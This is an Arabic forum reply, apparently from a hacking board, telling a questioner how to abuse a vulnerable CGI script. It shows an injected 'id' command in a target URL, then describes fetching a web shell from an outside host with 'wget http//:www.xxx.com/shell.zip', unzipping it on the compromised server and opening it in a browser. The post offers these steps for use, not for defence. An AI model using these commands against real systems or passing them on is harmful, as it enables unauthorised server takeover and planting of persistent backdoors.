قبل إضافة استفسارك ولكي لا يتعرض للحذف، أو ان تتعرض أنت للحظر، اقرأ قوانين قسم الإستفسارات
بالنسبة لثغرات الsql هي كثيرة ولها اوامرها الخاصة تقدر تفوت قسم المواقع والسيرفرات وتلاقي دورات ودروس كثيرة من اخواني الأعضاء واذا عندك اي استفسار عنها انا جاهز اما cgi فهي عبارة عن تطبيق اوامر على السيرفر مباشرة والأوامر هي اوامر لينكس وهي موجود في هذا الرابط http://www.aljyyosh.com/shell.html وكمثال الأخ Hidden pain target.com/path/vuhunable.cgi?file=id id هو امر معرفة صلاحيتك على السيرفر اذا كنت تريد رفع شيل على السيرفر نستخدم امر السحب wget وبعدها رابط للشيل بشرط ان يكون مرفوع على موقع وبصيغة zip كمثال : http//:www.xxx.com/shell.zip يعني يكون الأمر هكذا wget http//:www.xxx.com/shell.zip وبعدها نقوم بأظهار الملفات على المسار الي رفعنا فيه الشيل بأمر ls ونشوف اذا الشيل مرفوع او لا وبعدها نفك ضغط الشيل بأمر unzip يعني يصبح الأمر هكذا unzip shell.zip ونشوف مسار الشيل ونتصفحه على المستعرض والباقي كثير بس هاذ اهم شي تحياتي
قوانين المنتدى